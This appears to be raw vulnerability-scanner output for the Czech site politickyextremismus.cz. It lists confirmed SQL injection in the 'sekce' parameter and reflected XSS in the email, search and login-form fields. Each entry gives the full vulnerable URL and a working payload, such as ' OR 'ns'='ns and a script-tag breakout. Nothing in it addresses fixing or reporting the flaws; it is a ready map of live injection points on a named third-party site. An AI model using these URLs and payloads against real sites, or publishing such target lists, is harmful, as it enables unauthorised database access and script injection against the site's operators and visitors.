politickyextremismus.cz

Boolean Based SQL Injection

Severity :  Critical
Confirmation :   Confirmed
Vulnerable URL :  http://www.politickyextremismus.cz/index.php?sekce=' OR 'ns'='ns
Vulnerability Classifications:  PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: sekce
Parameter Type: Querystring
Attack Pattern: ' OR 'ns'='ns

Severity :  Critical
Confirmation :   Confirmed
Vulnerable URL :  http://www.politickyextremismus.cz/index.php?sekce=' OR 'ns'='ns&tema=0
Vulnerability Classifications:  PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: sekce
Parameter Type: Querystring
Attack Pattern: ' OR 'ns'='ns

Severity :  Critical
Confirmation :   Confirmed
Vulnerable URL :  http://www.politickyextremismus.cz/index.php?sekce=' OR 'ns'='ns&email=info
Vulnerability Classifications:  PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: sekce
Parameter Type: Querystring
Attack Pattern: ' OR 'ns'='ns

|||   XSS (Cross-site Scripting)

Severity :  Important
Confirmation :   Confirmed
Vulnerable URL :  http://www.politickyextremismus.cz/index.php?sekce=email&email='"--></style></script><script>alert(0x000093)</script>
Vulnerability Classifications:  PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: email
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x000093)</script>

Severity :  Important
Confirmation :   Confirmed
Vulnerable URL :  http://www.politickyextremismus.cz/index.php?sekce=hledani
Vulnerability Classifications:  PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: fraze
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x0000AD)</script>

Severity :  Important
Confirmation :   Confirmed
Vulnerable URL :  http://www.politickyextremismus.cz/index.php?akce=login
Vulnerability Classifications:  PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: username
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x0000C6)</script>